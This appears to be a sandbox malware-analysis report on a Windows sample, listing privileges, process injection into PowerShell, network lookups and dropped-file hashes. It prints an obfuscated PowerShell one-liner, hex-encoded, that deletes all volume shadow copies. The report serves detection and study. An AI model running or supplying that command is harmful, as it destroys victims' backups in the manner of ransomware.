Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2812 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\mal.exe

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 catsdegree.com udp
US 72.52.178.23:443 catsdegree.com tcp
NL 67.26.111.254:80 tcp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 72.52.178.23:443 catsdegree.com tcp

Files

memory/2812-115-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2812-117-0x0000000000030000-0x0000000000040000-memory.dmp

memory/2812-118-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3732-123-0x0000026698470000-0x0000026698492000-memory.dmp

memory/3732-127-0x0000026698460000-0x0000026698462000-memory.dmp

memory/3732-128-0x0000026698463000-0x0000026698465000-memory.dmp

memory/3732-129-0x0000026698750000-0x00000266987C6000-memory.dmp

memory/3732-141-0x0000026698466000-0x0000026698468000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5dc1c5e5f49d8a67a608b1f715ace841
SHA1 812f23c3fce094196e514f140702f69ba13aab1f
SHA256 d4df86e848e8eece19d9ec956704e488fe47de1df1a9d74dc2eba39ffdb39214
SHA512 ec232e6585f4c420076b634f8683dc0de1eaa29847efc398697f47313b1523d0f311d5dd35bb27e79e10ac807ccb5bdff220a66c35aaae82f3e4b13e517a5273